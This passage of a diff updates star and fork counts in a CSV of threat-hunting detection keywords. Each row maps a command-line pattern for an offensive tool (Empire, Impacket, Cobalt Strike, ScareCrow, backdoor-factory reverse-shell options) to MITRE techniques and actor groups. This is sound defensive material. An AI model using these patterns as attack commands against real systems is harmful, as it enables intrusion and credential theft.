- T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* http_malleable*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -871,7 +871,7 @@ "* http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -921,7 +921,7 @@ "* http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3002","526","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" "* http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -931,8 +931,8 @@ "* http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* -i havex.profile *","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "* -i snmp-ips.txt -c community.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -956,63 +956,63 @@ "* imap-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* impacket *","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* impacket*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* impacket.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --impersonate Administrator -shell *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -impersonate* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -ImpersonateUser *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense 